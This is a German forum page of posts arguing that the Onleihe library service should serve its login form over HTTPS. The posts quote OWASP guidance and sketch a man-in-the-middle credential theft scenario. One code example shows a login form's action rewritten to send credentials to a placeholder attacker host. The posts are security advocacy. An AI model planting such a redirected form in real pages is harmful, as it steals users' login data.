Beiträge von tomy

onleihe:hilfe
Aktuelle Meldungen finden Sie stets auf der :hilfeseite für die Onleihe.

  • Onleihe HTTPS

    Zitat von Annanymous

    HTTPS würde dagegen auch überhaupt nichts bringen.


    Oh doch. Genau aus diesem Grund muss das Anmeldeformular bereits per HTTPS an den Browser geliefert werden. Denn nur dann ist garantiert, dass ich das korrekte Anmeldeformular erhalte (und aus diesem Grund liefern die Banken die Anmeldeformulare per HTTPS aus.)


    Zitat von Annanymous

    Und da hapert es. Die Login-Daten können eben nicht verwandt werden, aBooks auszuleihen. Dazu benötigt man zwingend den Ausweis.


    Meine Bibliothek bietet mir freundlicherweise an, über das Internet Medien auszuleihen und diese per Post an mich zu senden. Da die divibib-Logindaten dieselben sind wie bei meiner Bibliothek (und ich das nicht ändern kann), können diese (zumindest in meinem Fall) sehr wohl missbraucht werden.

  • Onleihe HTTPS

    Ein MitM-Angriff kann zum Beispiel über unsichere Router zuhause oder unsichere Switches beim Internetprovider stattfinden.


    Das ganze könnte etwa so ablaufen (Entschuldigung wenn die Geschichte etwas krude klingt, ich bin weder ein guter Ganove noch ein guter Geschichtenerzähler):

    • Ganove A sucht nach Sicherheitsproblemen in Routern und anderer Internet-Infrastruktur.
    • Diese verkauft er über das Internet an Ganoven B, der damit in grossem Stil Benutzernamen und Passwörter für verschiedenste Dienste abgreift.
    • Die Benutzernamen und Passwörter werden weiterverkauft an Ganoven C, der entdeckt hat wie er diese zu Geld machen kann.
    • z.B.: Ganove C leiht im Namen von Benutzer XY bei einer Bibliothek wertvolle Bücher aus, lässt sich diese zusenden und verkauft sie weiter
    • Benutzer XY wird irgendwann von seiner Bibliothek aufgefordert, die ausgeliehenen Bücher doch bitte endlich zurückzubringen oder zu ersetzen und fällt aus allen Wolken

    Mit etwas mehr Kreativität lassen sich sicher weitere Wege finden, wie Ganove C aus Benutzernamen und Passwort Geld machen kann.

  • Onleihe HTTPS

    Na ja, man kann das als "mit dem dunklen Trenchcoat und Hut in die Buchhandlung gehen" abtun.


    Für mich fällt das allerdings in die Kategorie "die Wohnungstür mit Schloss und Riegel sichern, aber die Terrassentüre offen lassen"

  • Onleihe HTTPS

    Es reicht eben nicht, wenn nur die Anmeldedaten verschlüsselt übertragen werden.


    Die Experten von OWASP (Open Web Application Security Project) schreiben unter https://www.owasp.org/index.ph…rong_Transport_Everywhere folgendes:


    Zitat

    The login page and all subsequent authenticated pages must be exclusively accessed over TLS. The initial login page, referred to as the "login landing page", must be served over TLS. Failure to utilize TLS for the login landing page allows an attacker to modify the login form action, causing the user's credentials to be posted to an arbitrary location. Failure to utilize TLS for authenticated pages after the login enables an attacker to view the unencrypted session ID and compromise the user's authenticated session.


    Auf Deutsch:

    Zitat

    Die Login-Seite und alle darauffolgenden authentifizierten Seiten dürfen ausschliesslich über TLS (https) zugreifbar sein. Die initiale Login-Seite, auch "Login Landungsseite", muss über TLS (https) ausgeliefert werden. Wenn die Login Landungsseite nicht über https ausgeliefert wird, kann ein Angreifer die beim Login verwendete Adresse verändern, wodurch Username und Passwort zu einer beliebigen Seite umgeleitet werden können. [...]


    Anders gesagt: ein Angreifer kann die Seite, auf der ich meine Logindaten eingebe manipulieren. Er könnte zum Beispiel aus


    Code
    <form action="https://www.voebb.de/w3/divibib/access.rdr" method="post" accept-charset="ISO-8859-1">


    ein


    Code
    <form action="https://www.attacker.org/divibib" method="post" accept-charset="ISO-8859-1">


    machen, meine Eingabe aufzeichnen und die Daten im Hintergrund an die richtige Adresse weiterleiten.